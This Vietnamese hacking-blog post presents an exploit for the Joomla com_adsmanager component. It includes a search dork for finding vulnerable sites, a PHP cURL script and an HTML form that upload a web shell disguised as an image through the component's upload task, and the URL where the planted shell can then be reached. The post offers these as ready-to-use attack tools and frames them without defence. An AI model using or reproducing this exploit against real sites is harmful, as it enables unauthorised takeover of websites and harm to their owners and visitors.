• Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
AnonyViet
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
No Result
View All Result
AnonyViet
No Result
View All Result

Joomla com_adsmanager Exploit

AnonyViet by AnonyViet
20/12/2015
in SQL Injection
1
0
SHARES
Share on FacebookShare on Twitter

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org

CODE PHP :

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
 
$url = "site.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@shell.jpg",
"name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, );
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, );
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
 
?>

#CSRF :

PHP
1
2
3
4
<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

 

Các bài viết liên quan

Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 13

Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất

15/05/2017
Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery 3

Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery

03/04/2017
Hướng dẫn khai thác lỗi CMS Upload Website 2017 10

Bảo vệ: Hướng dẫn khai thác lỗi CMS Upload Website 2017

20/07/2018

Acces Shell: site.com/tmp/plupload/shell.php

Xem thêm:  Hướng dẫn khai thác lỗi CMS Upload Website 2017
Tags: exploitjoomla
Previous Post

XSS Vulnerability

 Next Post

Hướng dẫn Tạo tool hack disconect LoL

AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

SQL Injection

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

11/09/2018
Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full 8
SQL Injection

Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full

20/10/2017
Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống. 9
SQL Injection

Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống.

21/06/2017
SQLI Hunter v1.2 - Tự động tìm lỗi SQL Injection
SQL Injection

SQLI Hunter v1.2 – Tự động tìm lỗi SQL Injection

27/12/2015
Dork SQL 2015
SQL Injection

Dork SQL 2015

21/12/2015
Havij 1.17 PRO 1
SQL Injection

Havij 1.17 PRO

20/12/2015
Next Post
Hướng dẫn Tạo tool hack disconect LoL

Hướng dẫn Tạo tool hack disconect LoL

1
Để lại bình luận

avatar
1 Comment threads
0 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
1 Comment authors
Lâm Trung Tính Recent comment authors
avatar

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

newest oldest
Lâm Trung Tính | <span class="wpdiscuz-comment-count">948 comments</span>
Lâm Trung Tính | 948 comments

Nguyễn Lam để đây không biết chừng nào tới đây..hi..hi

Reply
12/06/2017 10:49 sáng

Liên hệ quảng cáo

Liên hệ quảng cáo

Đối tác

Liên hệ quảng cáo




Các bài mới

Cách tải tin nhắn Facebook Messenger về máy tính

19/02/2019
pubg lite logo

Cách Download và cài đặt PUBG LITE siêu nhẹ trên máy tính

18/02/2019

Tool gửi tin nhắn hàng loạt cho bạn bè có chọn lọc trên Facebook

17/02/2019
đồng hồ mi band 3 giá rẽ

Hướng dẫn mua Vòng đeo tay Mi Band 3 chỉ với 250K tại Thế giới di động

15/02/2019

Cách kiểm tra ai tương tác với bạn nhiều nhất trên Facebook

14/02/2019

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Bạn bè

Anonymousvn  – LoliTeam – Ai sẽ là người bạn tiếp theo của AnonyViet?

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

Bài viết mới

  • Cách tải tin nhắn Facebook Messenger về máy tính
  • Cách Download và cài đặt PUBG LITE siêu nhẹ trên máy tính
  • Tool gửi tin nhắn hàng loạt cho bạn bè có chọn lọc trên Facebook
  • Hướng dẫn mua Vòng đeo tay Mi Band 3 chỉ với 250K tại Thế giới di động
  • Cách kiểm tra ai tương tác với bạn nhiều nhất trên Facebook
  • Share Code nâng cấp Account Nhaccuatui VIP 2019
  • Giới thiệu về AnonyViet
  • Liên hệ Quảng cáo
  • Privacy & Policy
  • Contact

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

wpDiscuz